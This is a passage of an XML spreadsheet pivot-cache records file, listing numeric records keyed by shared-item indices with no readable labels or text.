    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="10"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1247"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1248"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1249"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1250"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1251"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1252"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1253"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1254"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1255"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1256"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1257"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1258"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1259"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1260"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1261"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1262"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="18"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="70"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="9"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="139"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="139"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="139"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="139"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="62"/>
    <x v="139"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="250"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1266"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
